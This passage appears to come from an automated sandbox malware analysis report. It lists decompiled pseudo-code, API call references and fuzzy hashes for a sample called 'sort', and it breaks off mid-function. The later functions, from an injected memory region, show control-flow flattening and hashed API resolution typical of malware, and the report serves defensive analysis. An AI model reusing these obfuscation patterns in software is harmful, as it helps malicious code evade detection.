                                            0x004111d7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004111d7
                                            0x004111ad
                                            0x004111b3
                                            0x00000000
                                            0x00000000
                                            0x004111be
                                            0x004111be
                                            0x004111c1
                                            0x004111c3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004111c3

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00410E0A
                                            • GetKeyState.USER32(00000001), ref: 00410E57
                                            • GetKeyState.USER32(00000002), ref: 00410E64
                                            • GetKeyState.USER32(00000004), ref: 00410E71
                                            • GetParent.USER32(?), ref: 00410E92
                                            • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00410F6C
                                            • SendMessageA.USER32(?,00000408,00000000,?), ref: 00410FB0
                                            • SendMessageA.USER32(?,00000404,00000000,00000028), ref: 00410FC8
                                            • ScreenToClient.USER32 ref: 00410FE4
                                            • GetCursorPos.USER32(?), ref: 0041103B
                                            • SendMessageA.USER32(?,00000412,00000000,?), ref: 00411059
                                            • SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004110BB
                                            • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 004110DE
                                            • SendMessageA.USER32(?,00000411,00000001,00000028), ref: 004110FA
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041110D
                                            • SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 00411139
                                            • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00411187
                                            • GetParent.USER32(?), ref: 004111B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
                                            • String ID: ($($@
                                            • API String ID: 986702660-2846432479
                                            • Opcode ID: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
                                            • Instruction ID: 13d5465373c71cfe337dff1ba131fcf840a9d493356aa9c13fb6cf6503e8bb35
                                            • Opcode Fuzzy Hash: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
                                            • Instruction Fuzzy Hash: 00C1A671A00315ABDF249F94CC85BEEBB75AF08704F10412BEB15BB2E1D7B898C58B59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00417B29() {
                                            				CHAR* _t29;
                                            				CHAR* _t36;
                                            				void* _t38;
                                            				CHAR* _t47;
                                            				void* _t53;
                                            
                                            				E00406520(E0042A77C, _t53);
                                            				_t47 =  *(_t53 + 8);
                                            				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
                                            					_t29 =  *0x436980; // 0x436994
                                            					 *(_t53 + 8) = _t29;
                                            					_push(_t53 + 8);
                                            					 *(_t53 - 4) = 0;
                                            					E00417BF9(_t53, _t47);
                                            					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
                                            						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
                                            							CharUpperA(_t47);
                                            						}
                                            						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
                                            							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
                                            							if(_t38 != 0xffffffff) {
                                            								FindClose(_t38);
                                            								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
                                            							}
                                            						}
                                            						_push(1);
                                            						_pop(0);
                                            					}
                                            					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                                            					E00416AEC(_t53 + 8);
                                            					_t36 = 0;
                                            				} else {
                                            					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
                                            					_t36 = 0;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                                            				return _t36;
                                            			}









                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00417B2E
                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00417B8F
                                            • CharUpperA.USER32(?), ref: 00417BA0
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00417BB6
                                            • FindClose.KERNEL32(00000000), ref: 00417BC2
                                            • lstrcpyA.KERNEL32(?,?), ref: 00417BD2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                            • String ID:
                                            • API String ID: 304730633-0
                                            • Opcode ID: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
                                            • Instruction ID: d6ea0ce2269d815b5d4983ac84d4510317191ca485f23a24ef5020b763cd6ff7
                                            • Opcode Fuzzy Hash: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
                                            • Instruction Fuzzy Hash: 71215C71A04119ABCB209F61DC48EEF7F7CEF05768F008166F919E61A0D7349A46CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0041E95F(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr* _v20;
                                            				struct tagPOINT _v28;
                                            				intOrPtr _v36;
                                            				signed char _v65;
                                            				char _v72;
                                            				void* _t58;
                                            				void* _t60;
                                            				intOrPtr _t64;
                                            				intOrPtr _t67;
                                            				intOrPtr _t110;
                                            				intOrPtr _t111;
                                            				intOrPtr* _t113;
                                            
                                            				_t110 = _a4;
                                            				_t113 = __ecx;
                                            				if(E00414007(__ecx, _t110) != 0) {
                                            					L38:
                                            					_t58 = 1;
                                            					return _t58;
                                            				}
                                            				_t111 =  *((intOrPtr*)(_t110 + 4));
                                            				_v20 = E00404FFE(__ecx);
                                            				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
                                            					if(_t111 < 0x200 || _t111 > 0x209) {
                                            						if(_t111 < 0xa0 || _t111 > 0xa9) {
                                            							goto L30;
                                            						} else {
                                            							goto L8;
                                            						}
                                            					} else {
                                            						L8:
                                            						_v16 = E004249C4();
                                            						_t67 = _a4;
                                            						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
                                            						_v28.x =  *(_t67 + 0x14);
                                            						ScreenToClient( *(_t113 + 0x1c),  &_v28);
                                            						E00406330( &_v72, 0, 0x2c);
                                            						_v72 = 0x28;
                                            						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
                                            						if(_v36 != 0xffffffff) {
                                            							E004062E0(_v36);
                                            						}
                                            						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
                                            							_v12 = _v12 & 0x00000000;
                                            							if(_t111 != 0x201 && GetKeyState(1) < 0) {
                                            								_v8 =  *((intOrPtr*)(_v16 + 0x104));
                                            							}
                                            						} else {
                                            							_v12 = 1;
                                            						}
                                            						if(_v8 < 0 || _v12 != 0) {
                                            							if(GetKeyState(1) >= 0 || _v12 != 0) {
                                            								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
                                            								KillTimer( *(_t113 + 0x1c), 0xe001);
                                            							}
                                            							goto L29;
                                            						} else {
                                            							if(_t111 != 0x202) {
                                            								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
                                            									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
                                            								} else {
                                            									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
                                            										L29:
                                            										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
                                            										goto L30;
                                            									}
                                            									_push(0x12c);
                                            									_push(0xe000);
                                            									L20:
                                            									E0041E722(_t113);
                                            								}
                                            								goto L29;
                                            							}
                                            							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
                                            							_push(0xc8);
                                            							_push(0xe001);
                                            							goto L20;
                                            						}
                                            					}
                                            				} else {
                                            					L30:
                                            					_t60 = E00414DCC(_t113);
                                            					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
                                            						if(_v20 == 0) {
                                            							L36:
                                            							return E00415EEB(_a4);
                                            						} else {
                                            							goto L34;
                                            						}
                                            						while(1) {
                                            							L34:
                                            							_t112 = _v20;
                                            							_push(_a4);
                                            							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
                                            								goto L38;
                                            							}
                                            							_t64 = E00414C6C(_t112);
                                            							_v20 = _t64;
                                            							if(_t64 != 0) {
                                            								continue;
                                            							}
                                            							goto L36;
                                            						}
                                            						goto L38;
                                            					} else {
                                            						return 0;
                                            					}
                                            				}
                                            			}



















                                            APIs
                                              • Part of subcall function 00404FFE: GetParent.USER32(?), ref: 00405008
                                            • ScreenToClient.USER32 ref: 0041E9E9
                                            • GetKeyState.USER32(00000001), ref: 0041EA46
                                            • GetKeyState.USER32(00000001), ref: 0041EA98
                                            • GetKeyState.USER32(00000001), ref: 0041EACE
                                            • KillTimer.USER32(?,0000E001), ref: 0041EAF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: State$ClientKillParentScreenTimer
                                            • String ID: (
                                            • API String ID: 2757461879-3887548279
                                            • Opcode ID: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
                                            • Instruction ID: 933066e1b9ae1ffc9999b2effe157d6391a28475e321b0032f1d86925bea9953
                                            • Opcode Fuzzy Hash: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
                                            • Instruction Fuzzy Hash: 09518179A00205DBDF24DB96C488BEE7BB1AF44354F14006AED16A72D1C7B869C2CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E00422488(void* __ecx, signed int _a4, long _a8) {
                                            				struct HWND__* _v8;
                                            				long _t24;
                                            				void* _t29;
                                            				int _t32;
                                            				struct HWND__* _t36;
                                            
                                            				_push(__ecx);
                                            				_t29 = __ecx;
                                            				if(GetKeyState(0x11) < 0) {
                                            					_push(8);
                                            					_pop(0);
                                            				}
                                            				if(GetKeyState(0x10) < 0) {
                                            					_push(4);
                                            					_pop(0);
                                            				}
                                            				_t36 = GetFocus();
                                            				_v8 = GetDesktopWindow();
                                            				if(_t36 != 0) {
                                            					_t32 = _a4 << 0x10;
                                            					do {
                                            						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
                                            						_t36 = GetParent(_t36);
                                            					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
                                            				} else {
                                            					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                            				}
                                            				return _t24;
                                            			}









                                            APIs
                                            • GetKeyState.USER32(00000011), ref: 00422499
                                            • GetKeyState.USER32(00000010), ref: 004224A9
                                            • GetFocus.USER32(?,?,?,00000098), ref: 004224B9
                                            • GetDesktopWindow.USER32 ref: 004224C1
                                            • SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5
                                            • SendMessageA.USER32(00000000,0000020A,?,?), ref: 00422504
                                            • GetParent.USER32(00000000), ref: 0042250D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageSendState$DesktopFocusParentWindow
                                            • String ID:
                                            • API String ID: 4150626516-0
                                            • Opcode ID: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
                                            • Instruction ID: 20f266b1a498cc3956224d16169f9dc1dc704df93882e012ad9005a8c3fefddb
                                            • Opcode Fuzzy Hash: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
                                            • Instruction Fuzzy Hash: A4110D32B00334BFEB502BA5AD48EAA7798EB14794F904137FE41D7250DBF49C4256E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E00422473(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
                                            				struct HWND__* _v8;
                                            				long _t33;
                                            				void* _t40;
                                            				int _t43;
                                            				struct HWND__* _t47;
                                            				void* _t49;
                                            
                                            				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
                                            				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
                                            				_push(_t49);
                                            				_push(0x98);
                                            				_push(__ebx);
                                            				_t40 = 0x98;
                                            				if(GetKeyState(0x11) < 0) {
                                            					_push(8);
                                            					_pop(0);
                                            				}
                                            				if(GetKeyState(0x10) < 0) {
                                            					_push(4);
                                            					_pop(0);
                                            				}
                                            				_t47 = GetFocus();
                                            				_v8 = GetDesktopWindow();
                                            				if(_t47 != 0) {
                                            					_t43 = _a4 << 0x10;
                                            					do {
                                            						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
                                            						_t47 = GetParent(_t47);
                                            					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
                                            				} else {
                                            					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                                            				}
                                            				return _t33;
                                            			}










                                            APIs
                                            • GetKeyState.USER32(00000011), ref: 00422499
                                            • GetKeyState.USER32(00000010), ref: 004224A9
                                            • GetFocus.USER32(?,?,?,00000098), ref: 004224B9
                                            • GetDesktopWindow.USER32 ref: 004224C1
                                            • SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: State$DesktopFocusMessageSendWindow
                                            • String ID:
                                            • API String ID: 2814764316-0
                                            • Opcode ID: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
                                            • Instruction ID: b57d560b4246ca497f525dd7341a5897b5c585060d52b80c51f82830bbc2b57b
                                            • Opcode Fuzzy Hash: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
                                            • Instruction Fuzzy Hash: 4C012032B003257FEB102B94ED45FA97798EB147A4F904437FE42D7191EAF8AC4396A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041580E(void* __ecx) {
                                            				void* _t11;
                                            				void* _t12;
                                            				void* _t16;
                                            
                                            				_t12 = __ecx;
                                            				if((E00416528(__ecx) & 0x40000000) != 0) {
                                            					L6:
                                            					return E004136A7(_t12);
                                            				}
                                            				_t16 = E00404DAE();
                                            				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                            					goto L6;
                                            				} else {
                                            					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
                                            					_t11 = 1;
                                            					return _t11;
                                            				}
                                            			}







                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetKeyState.USER32(00000010), ref: 00415832
                                            • GetKeyState.USER32(00000011), ref: 0041583B
                                            • GetKeyState.USER32(00000012), ref: 00415844
                                            • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041585A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: State$LongMessageSendWindow
                                            • String ID:
                                            • API String ID: 1063413437-0
                                            • Opcode ID: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
                                            • Instruction ID: 667728aae4084d5946ddf495d1d29dbc27f199ee829e175ed2889692379dfdac
                                            • Opcode Fuzzy Hash: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
                                            • Instruction Fuzzy Hash: 47F0E232740746E5E63036931C42FD913144FC0BD4F45083AB701AE1D18A9988E30278
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E02271FB0(intOrPtr* __ecx, intOrPtr* __edx) {
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t26;
                                            				intOrPtr* _t28;
                                            				signed int _t29;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            				intOrPtr* _t40;
                                            				intOrPtr* _t44;
                                            				intOrPtr* _t45;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t49;
                                            				intOrPtr* _t50;
                                            				intOrPtr* _t54;
                                            				intOrPtr* _t57;
                                            				intOrPtr* _t58;
                                            				intOrPtr _t60;
                                            				intOrPtr _t66;
                                            				intOrPtr* _t85;
                                            				intOrPtr _t88;
                                            				void* _t89;
                                            				intOrPtr _t91;
                                            				intOrPtr _t93;
                                            				intOrPtr _t94;
                                            				intOrPtr* _t95;
                                            				void* _t96;
                                            				void* _t98;
                                            				void* _t99;
                                            
                                            				_t58 = __ecx;
                                            				_t88 =  *((intOrPtr*)(_t96 + 0x1c));
                                            				_t95 = __edx;
                                            				 *((intOrPtr*)(_t96 + 0x10)) = __ecx;
                                            				_t57 = 0;
                                            				_t26 = 0x1e37d88e;
                                            				while(1) {
                                            					L1:
                                            					_t91 =  *((intOrPtr*)(_t96 + 0x18));
                                            					goto L2;
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t98 = _t26 - 0x27643e76;
                                            							if(_t98 > 0) {
                                            								break;
                                            							}
                                            							if(_t98 == 0) {
                                            								_t26 = 0x1f9931a7;
                                            								continue;
                                            							} else {
                                            								_t99 = _t26 - 0x1f9931a7;
                                            								if(_t99 > 0) {
                                            									__eflags = _t26 - 0x234da148;
                                            									if(_t26 == 0x234da148) {
                                            										__eflags = _t57;
                                            										if(_t57 == 0) {
                                            											E02274250(_t57,  *_t95);
                                            										}
                                            										goto L44;
                                            									} else {
                                            										__eflags = _t26 - 0x23930c9c;
                                            										if(_t26 != 0x23930c9c) {
                                            											goto L40;
                                            										} else {
                                            											_t44 =  *0x227e120;
                                            											__eflags = _t44;
                                            											if(_t44 == 0) {
                                            												_t44 = E02273E80(_t57, E02273F20(0x667fdee), 0x207605dd, _t95);
                                            												 *0x227e120 = _t44;
                                            											}
                                            											_t60 =  *0x227e2e4; // 0x4d8ea8
                                            											_t45 =  *_t44( *((intOrPtr*)(_t96 + 0x28)), _t91, 0x60,  *((intOrPtr*)(_t60 + 0x1c)), 0, 0);
                                            											_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                            											__eflags = _t45;
                                            											_t26 = 0x3134f996;
                                            											_t57 =  !=  ? 1 : _t57;
                                            											continue;
                                            										}
                                            									}
                                            								} else {
                                            									if(_t99 == 0) {
                                            										_t47 =  *0x227dea8;
                                            										_t93 =  *((intOrPtr*)(_t58 + 4)) + 0xffffff8c;
                                            										 *((intOrPtr*)(_t95 + 4)) = _t93;
                                            										__eflags = _t47;
                                            										if(_t47 == 0) {
                                            											_t47 = E02273E80(_t57, E02273F20(0xbb398380), 0x97f883e, _t95);
                                            											 *0x227dea8 = _t47;
                                            										}
                                            										_t89 =  *_t47();
                                            										_t49 =  *0x227dcec;
                                            										__eflags = _t49;
                                            										if(_t49 == 0) {
                                            											_t49 = E02273E80(_t57, E02273F20(0xbb398380), 0xe9233692, _t95);
                                            											 *0x227dcec = _t49;
                                            										}
                                            										_t50 =  *_t49(_t89, 8, _t93);
                                            										 *_t95 = _t50;
                                            										__eflags = _t50;
                                            										if(_t50 == 0) {
                                            											L44:
                                            											return _t57;
                                            										} else {
                                            											_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                            											_t91 =  *_t58;
                                            											 *((intOrPtr*)(_t96 + 0x18)) = _t91;
                                            											_t88 =  *((intOrPtr*)(_t58 + 4)) - 0x74;
                                            											 *((intOrPtr*)(_t96 + 0x1c)) = _t91 + 0x74;
                                            											_t26 = 0x3ac56b1d;
                                            											continue;
                                            										}
                                            									} else {
                                            										if(_t26 == 0x72b6082) {
                                            											_t54 =  *0x227daac;
                                            											_t94 =  *_t95;
                                            											__eflags = _t54;
                                            											if(_t54 == 0) {
                                            												_t54 = E02273E80(_t57, E02273F20(0xe66945e6), 0x70f7b8ec, _t95);
                                            												 *0x227daac = _t54;
                                            											}
                                            											 *_t54(_t94,  *((intOrPtr*)(_t96 + 0x20)), _t88);
                                            											_t58 =  *((intOrPtr*)(_t96 + 0x1c));
                                            											_t96 = _t96 + 0xc;
                                            											_t26 = 0x3126cae3;
                                            											goto L1;
                                            										} else {
                                            											if(_t26 != 0x1e37d88e) {
                                            												goto L40;
                                            											} else {
                                            												_t26 = 0x323ed498;
                                            												continue;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L45:
                                            						}
                                            						__eflags = _t26 - 0x323ed498;
                                            						if(__eflags > 0) {
                                            							__eflags = _t26 - 0x3ac56b1d;
                                            							if(_t26 != 0x3ac56b1d) {
                                            								goto L40;
                                            							} else {
                                            								_t28 =  *0x227def8;
                                            								__eflags = _t28;
                                            								if(_t28 == 0) {
                                            									_t28 = E02273E80(_t57, E02273F20(0x667fdee), 0xb11f83b0, _t95);
                                            									 *0x227def8 = _t28;
                                            								}
                                            								_t66 =  *0x227e2e4; // 0x4d8ea8
                                            								_t29 =  *_t28( *((intOrPtr*)(_t66 + 0x18)), 0, 0, _t96 + 0x14);
                                            								_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                            								asm("sbb eax, eax");
                                            								_t26 = ( ~_t29 & 0xe3ddbf3a) + 0x234da148;
                                            								goto L2;
                                            							}
                                            						} else {
                                            							if(__eflags == 0) {
                                            								__eflags =  *((intOrPtr*)(_t58 + 4)) - 0x74;
                                            								if( *((intOrPtr*)(_t58 + 4)) < 0x74) {
                                            									goto L44;
                                            								} else {
                                            									_t26 = 0x27643e76;
                                            									goto L2;
                                            								}
                                            							} else {
                                            								__eflags = _t26 - 0x3126cae3;
                                            								if(_t26 == 0x3126cae3) {
                                            									_t85 =  *0x227df8c;
                                            									__eflags = _t85;
                                            									if(_t85 == 0) {
                                            										_t85 = E02273E80(_t57, E02273F20(0x667fdee), 0x47a72724, _t95);
                                            										 *0x227df8c = _t85;
                                            									}
                                            									_t34 =  *0x227e2e4; // 0x4d8ea8
                                            									_t35 =  *_t85( *((intOrPtr*)(_t34 + 0x20)),  *((intOrPtr*)(_t96 + 0x24)), 1, 0,  *_t95, _t95 + 4);
                                            									_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                            									asm("sbb eax, eax");
                                            									_t26 = ( ~_t35 & 0xf25e1306) + 0x3134f996;
                                            									goto L2;
                                            								} else {
                                            									__eflags = _t26 - 0x3134f996;
                                            									if(_t26 != 0x3134f996) {
                                            										goto L40;
                                            									} else {
                                            										_t40 =  *0x227e168;
                                            										__eflags = _t40;
                                            										if(_t40 == 0) {
                                            											_t40 = E02273E80(_t57, E02273F20(0x667fdee), 0xae646c41, _t95);
                                            											 *0x227e168 = _t40;
                                            										}
                                            										 *_t40( *((intOrPtr*)(_t96 + 0x14)));
                                            										_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                            										_t26 = 0x234da148;
                                            										goto L2;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L45;
                                            						L40:
                                            						__eflags = _t26 - 0x6df8497;
                                            					} while (_t26 != 0x6df8497);
                                            					return _t57;
                                            					goto L45;
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: v>d'$v>d'$Ei
                                            • API String ID: 0-262821485
                                            • Opcode ID: fcfc975058839cbba5be4c4c221fd8380e506e101e4b36af56e2b154b59545cd
                                            • Instruction ID: 350000cf7f210539253bb1f02fe394f8de718ef21e4215b6968a5241ec342850
                                            • Opcode Fuzzy Hash: fcfc975058839cbba5be4c4c221fd8380e506e101e4b36af56e2b154b59545cd
                                            • Instruction Fuzzy Hash: 0761F531B2C302DBCB14EEE6A894B2A33A6BF94344F10495AE845CB358DB70DC15DB97
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E02272290(signed int* __ecx, signed int* __edx) {
                                            				char _v25;
                                            				char _v108;
                                            				char _v112;
                                            				char _v116;
                                            				signed int _v120;
                                            				char _v124;
                                            				signed int _v128;
                                            				signed int* _v132;
                                            				signed int* _v136;
                                            				signed int* _v140;
                                            				signed int* _v144;
                                            				signed int* _v148;
                                            				signed int* _v152;
                                            				signed int* _v156;
                                            				signed int* _v160;
                                            				signed int* _v164;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				signed int* _t61;
                                            				intOrPtr _t63;
                                            				signed int _t69;
                                            				intOrPtr _t72;
                                            				signed int _t79;
                                            				signed int _t85;
                                            				signed int _t86;
                                            				signed int _t88;
                                            				signed int _t89;
                                            				intOrPtr _t92;
                                            				signed int _t93;
                                            				signed int _t98;
                                            				signed int _t104;
                                            				signed int _t106;
                                            				signed int _t111;
                                            				signed int* _t112;
                                            				signed int _t113;
                                            				signed int _t117;
                                            				intOrPtr* _t120;
                                            				signed int* _t139;
                                            				signed int _t142;
                                            				signed int _t147;
                                            				void* _t148;
                                            				signed int _t149;
                                            				signed int _t150;
                                            				signed int _t151;
                                            				signed int _t152;
                                            				signed int _t155;
                                            				signed int** _t157;
                                            				void* _t159;
                                            				void* _t160;
                                            
                                            				_t157 =  &_v140;
                                            				_t104 = _v120;
                                            				_t155 = _v120;
                                            				_v132 = __edx;
                                            				_t150 = 0x3b18423d;
                                            				_v136 = __ecx;
                                            				_v128 = 0;
                                            				while(1) {
                                            					L1:
                                            					_t61 = _v140;
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t159 = _t150 - 0x1c8b703e;
                                            							if(_t159 > 0) {
